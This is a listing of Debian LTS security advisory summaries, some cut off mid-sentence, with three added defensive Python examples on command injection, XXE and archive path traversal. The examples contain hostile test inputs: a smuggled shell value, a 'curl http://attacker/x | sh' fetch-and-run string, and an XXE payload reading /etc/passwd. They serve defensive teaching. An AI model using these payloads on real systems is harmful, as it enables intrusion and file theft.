Debian LTS Linux Distribution - Page 51.5
Find the information you need for your favorite open source distribution .
A security vulnerability has been found in Kaminari, a pagination engine plugin for Rails 3+ and other modern frameworks, that would allow an attacker to inject arbitrary HTML or script (cross-site scripting) into pages that render pagination links.
An issue has been found in grilo, a framework for discovering and browsing media. Because TLS certificate verification was missing, users are vulnerable to man-in-the-middle (MITM) attacks on the network.
The legacy 1.0 version of OpenSSL, a cryptography library for secure communication, fails to validate alternate trust chains in some conditions. In particular this breaks connecting to servers that use Let's Encrypt certificates from 2021-10-01 onwards: the chain those servers commonly send ends in the DST Root CA X3 certificate, which has expired, and a client that cannot fall back to the alternate chain ending in the ISRG Root X1 certificate in its trust store rejects the connection.
Multiple vulnerabilities were discovered in nettle, a low-level cryptographic library, which could result in denial of service (a remote crash in RSA decryption via specially crafted ciphertext, and a crash on ECDSA signature verification) or in incorrect verification of ECDSA signatures.
GnuTLS, a portable cryptography library, fails to validate alternate trust chains in some conditions. In particular this breaks connecting to servers that use Let's Encrypt certificates from 2021-10-01 onwards, when the DST Root CA X3 certificate that terminates the chain those servers commonly send expired and the client fails to fall back to the alternate chain ending in ISRG Root X1.
One security issue has been discovered in sssd. The sssctl command was vulnerable to shell command injection via the logs-fetch and cache-expire subcommands. This flaw allows an attacker to trick the root
Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code. For Debian 9 stretch, this problem has been fixed in version
It was found that the patch for CVE-2021-3592 introduced a regression which prevented ssh connections to the host system. Since there is no imminent solution for the problem, the patch for CVE-2021-3592 has been reverted. Updated qemu packages are now available to correct this issue.
Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.
An issue has been found in btrbk, a backup tool for btrfs subvolumes. Due to a flaw in how ssh_filter_btrbk.sh, used in authorized_keys to filter the SSH commands that remote hosts may run, handled those commands, an arbitrary code execution would
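Both the sssctl entry and the btrbk entry above describe the same class of bug: an untrusted string reaches a shell that interprets it. The following is an added example (not the sssd or btrbk code, and not Debian's patch) showing the vulnerable string-built command beside the argv-based fix, and a small forced-command filter of the kind ssh_filter_btrbk.sh stands in for. The file name, the `ALLOWED` program allowlist and the argument pattern are hypothetical; the attacker-controlled value is constructed for the demo.

```python
"""Command injection via string-built shell commands, beside the argv-based fix."""
import re
import shlex
import subprocess
from typing import List

# Constructed attacker-controlled value: a "file name" that smuggles a second command.
UNTRUSTED_NAME = "logs.tgz; echo INJECTED"


def run_via_shell(name: str) -> str:
    """Vulnerable pattern: the value is spliced into a command line that /bin/sh parses,
    so ';' ends the intended command and starts the attacker's."""
    cmd = "echo archiving to " + name
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_via_argv(name: str) -> str:
    """Safe pattern: the value is one argv element; no shell ever sees it, so ';',
    quotes and $(...) are just bytes in an argument."""
    argv = ["echo", "archiving to", name]
    return subprocess.run(argv, capture_output=True, text=True).stdout


# Hypothetical allowlist for a forced-command filter (command="..." in authorized_keys).
ALLOWED = {"btrfs", "cat"}
ARG_PATTERN = re.compile(r"[A-Za-z0-9_./@-]+")


def filter_forced_command(original: str) -> List[str]:
    """Parse SSH_ORIGINAL_COMMAND with shell quoting rules, allowlist the program and
    restrict every argument to a safe character set. The returned argv is meant for
    execvp()/subprocess.run() WITHOUT a shell; matching the raw string with regexes
    and then handing it to 'sh -c' is exactly the pattern that gets bypassed."""
    argv = shlex.split(original)
    if not argv or argv[0] not in ALLOWED:
        raise PermissionError(f"command not allowed: {original!r}")
    for arg in argv[1:]:
        # shlex keeps ';', '$(' and backticks inside tokens, so they fail this match.
        if not ARG_PATTERN.fullmatch(arg):
            raise PermissionError(f"argument rejected: {arg!r}")
    return argv


def is_allowed(original: str) -> bool:
    try:
        filter_forced_command(original)
    except (PermissionError, ValueError):  # ValueError: unbalanced quotes from shlex
        return False
    return True


if __name__ == "__main__":
    print(run_via_shell(UNTRUSTED_NAME))   # second line "INJECTED" proves the injection
    print(run_via_argv(UNTRUSTED_NAME))    # one literal line, no second command
    print(is_allowed("btrfs subvolume list /mnt/data"))
    print(is_allowed("btrfs subvolume list /mnt; curl http://attacker/x | sh"))
```

The filter is deliberately strict rather than a denylist of metacharacters: a forced command only has to admit the handful of invocations the remote side legitimately needs, and anything it does admit must be executed as an argv vector, never re-joined into a string.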
An XML external entity (XXE) injection in pywps allows an attacker to view files on the application server filesystem by assigning a path to the entity.
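What the pywps entry describes is the generic XXE shape: a request body declares an entity whose SYSTEM identifier is a file path, and the parser substitutes the file's contents where the entity is referenced, so anything the application echoes back leaks the file. The following is an added example (not pywps code and not Debian's fix) of the mitigation a practitioner would want: refuse any DOCTYPE before parsing, since that is the only place an entity can be declared. The `Execute`/`Identifier` element names are a constructed request shape, not the real WPS schema.

```python
"""Rejecting XML external entities (XXE) before a request body is parsed."""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised when a document declares a DTD or references an external entity."""


# Constructed XXE payload: the entity points at a server-side file and its expansion
# lands in an element the application would normally echo back.
XXE_REQUEST = b"""<?xml version="1.0"?>
<!DOCTYPE Execute [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<Execute><Identifier>&xxe;</Identifier></Execute>"""

# Constructed benign request for comparison.
BENIGN_REQUEST = b"""<?xml version="1.0"?>
<Execute><Identifier>buffer</Identifier></Execute>"""


def check_no_dtd(data: bytes) -> None:
    """First pass with a bare expat parser. Any DOCTYPE (internal or external subset,
    general or parameter entities) aborts parsing, as does an external entity reference
    that somehow reached the content."""

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE declaration refused: {name!r}")

    def on_external_entity(context, base, sysid, pubid):
        raise UnsafeXMLError(f"external entity refused: {sysid!r}")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(data, True)  # exceptions raised in handlers propagate out of Parse()


def parse_request(data: bytes) -> ET.Element:
    """Parse a request body only after the DTD check has passed."""
    check_no_dtd(data)
    return ET.fromstring(data)


def is_rejected(data: bytes) -> bool:
    try:
        parse_request(data)
    except UnsafeXMLError:
        return True
    return False


if __name__ == "__main__":
    print("xxe rejected:", is_rejected(XXE_REQUEST))
    print("benign identifier:", parse_request(BENIGN_REQUEST).find("Identifier").text)
```

Rejecting the DOCTYPE outright is the robust choice when the application never needs a DTD: it also closes parameter-entity and out-of-band variants of XXE, and entity-expansion denial of service ("billion laughs"), without depending on which features a given parser enables by default.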
Several security vulnerabilities have been found in Qemu, a fast processor emulator. CVE-2021-3713
An issue has been found in squashfs-tools, a tool to create and append to squashfs filesystems. As unsquashfs did not validate all filepaths, it would allow writing
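The squashfs-tools entry is the archive-extraction form of path traversal: member paths are taken from the image and written relative to the destination without checking where they end up. The following is an added example (not squashfs-tools code and not Debian's patch) of the containment check such a tool needs. It goes beyond the lexical `..` case to the symlink case, where an earlier member plants a link inside the destination and a later member writes through it; member names and the destination are constructed for the demo.

```python
"""Containing archive member paths inside the extraction directory."""
import os
import tempfile
from typing import Dict, Iterable


class PathEscape(ValueError):
    """Raised when a member path would resolve outside the destination directory."""


def resolve_member(dest: str, member: str) -> str:
    """Return the on-disk path for an archive member, or raise PathEscape."""
    dest_real = os.path.realpath(dest)
    if os.path.isabs(member):
        raise PathEscape(f"absolute member path: {member!r}")
    # Lexical check: normalise away '.' and '..' and require the result to stay under dest.
    candidate = os.path.normpath(os.path.join(dest_real, member))
    if os.path.commonpath([dest_real, candidate]) != dest_real:
        raise PathEscape(f"'..' traversal: {member!r}")
    # Filesystem check: a symlink written by an earlier member can redirect the parent
    # directory outside dest even though the path looks fine lexically.
    parent_real = os.path.realpath(os.path.dirname(candidate))
    if os.path.commonpath([dest_real, parent_real]) != dest_real:
        raise PathEscape(f"symlink escape: {member!r}")
    return os.path.join(parent_real, os.path.basename(candidate))


def classify_members(dest: str, members: Iterable[str]) -> Dict[str, str]:
    """Map each member to 'ok' or 'rejected' without writing anything."""
    out = {}
    for member in members:
        try:
            resolve_member(dest, member)
            out[member] = "ok"
        except PathEscape:
            out[member] = "rejected"
    return out


def demo() -> Dict[str, str]:
    """Constructed member list run against a fresh temporary destination."""
    with tempfile.TemporaryDirectory() as dest:
        # Simulate a symlink member that was extracted earlier (members are written in order).
        os.symlink("/", os.path.join(dest, "link"))
        return classify_members(dest, [
            "etc/motd",           # ordinary member, stays inside dest
            "../outside",         # classic traversal
            "/etc/passwd",        # absolute path
            "a/b/../../../x",     # traversal hidden behind normal components
            "link/etc/passwd",    # lexically inside, escapes through the symlink
        ])


if __name__ == "__main__":
    for member, verdict in demo().items():
        print(f"{verdict:8s} {member}")
```

The check-then-write sequence still leaves a race if something else can modify the destination while extraction runs; an extractor that must be robust against that opens the final component with O_NOFOLLOW relative to an already-opened parent directory descriptor rather than re-resolving a full path string.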
PostgreSQL 9.6.23 fixes this security issue: Disallow SSL renegotiation more completely (Michael Paquier)
Several vulnerabilities have been discovered in Exiv2, a C++ library and command-line utility for managing image metadata, which could result in denial of service or the execution of arbitrary code if a malformed file is parsed.
An issue has been found in gthumb, an image viewer and browser. A heap-based buffer overflow in _cairo_image_surface_create_from_jpeg() in extensions/cairo_io/cairo-image-surface-jpeg.c allows attackers to
An issue has been found in tnef, a tool to unpack MIME application/ms-tnef attachments. Using emails with a crafted winmail.dat application/ms-tnef attachment
During the backporting of one of the patches for CVE-2020-22021, one line was misinterpreted, which caused a regression in the deinterlacing process. Thanks to Jari Ruusu for reporting the issue and for testing the prepared update.
An issue has been found in ircii, an Internet Relay Chat client. A crafted CTCP UTC message could allow an attacker to disconnect the victim from an IRC server due to a segmentation fault and client crash.
An issue has been found in scrollz, an advanced ircII-based IRC client. A crafted CTCP UTC message could allow an attacker to disconnect the victim from an IRC server due to a segmentation fault and client crash.